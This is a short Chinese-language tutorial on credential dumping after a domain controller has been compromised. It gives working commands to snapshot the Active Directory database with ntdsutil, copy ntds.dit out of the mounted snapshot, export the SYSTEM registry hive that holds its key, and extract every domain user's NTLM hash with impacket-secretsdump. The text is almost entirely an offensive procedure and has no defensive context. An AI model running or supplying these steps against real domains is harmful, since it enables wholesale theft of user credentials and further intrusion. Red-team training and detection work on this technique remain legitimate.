前提:在获取了域控权限后,可以通过读取ntds.dit 获取域内更多资产信息
概念:
在活动目录中,所有域内数据都保存在ntds.dit中,存储位置为 %SystemRoot%\ntds\ntds.dit,ntds.dit中包含用户名,散列值,组,OU,GPP等活动目录相关信息;
在域控主机中默认自带了ntdsutil.exe ,是一个为活动目录提供管理机制的程序,使用ntdsutil.exe 用于维护活动目录等,ntdsutil.exe 支持的操作系统有win2003,win2008,win2012;
目的:通过域控win2008上的ntdsutil.exe 获取域内所有用户用户名和ntlm hash值;
实操提取ntds.dit:
1,对于不熟悉的命令,通过查看帮助是个好习惯:
ntdsutil ?
ntdsutil snapshot ?
2,在域控主机命令行 通过ntdsutil 创建一个快照:
ntdsutil snapshot “activate instance ntds[活动实例名字]” create quit quit
通过此命令生成了一个GUID[快照ID ]为{a75d0907-6afc-405e-9776-4afef6784a7d}的快照
3,加载刚刚创建的快照【挂载快照】:ntdsutil snapshot “mount {GUID}” quit quit
挂载成功后将在C盘下生成一个文件夹:
执行命令,将ntds.dit复制得到C盘:
copy C:$SNAP_202111171154_VOLUMEC$\Windows\NTDS\ntds.dit c:\ntds.dit
4,卸载并删除挂载的快照:
ntdsutil snapshot “unmount {a75d0907-6afc-405e-9776-4afef6784a7d}” “delete {a75d0907-6afc-405e-9776-4afef6784a7d}” quit quit
5,导出ntds.dit后,需要将注册表中的hklm\system键值对导出,因为该键值对中存放着ntds.dit的密钥,如果没有该密钥,将无法查看ntds.dit中的信息:
reg save hklm\system C:\system.hive
6,使用kali的impacket工具包导出散列值
将C盘下的ntds.dit 和 system.hive复制到kali,执行:
impacket-secretsdump -system system.hive -ntds ntds.dit local
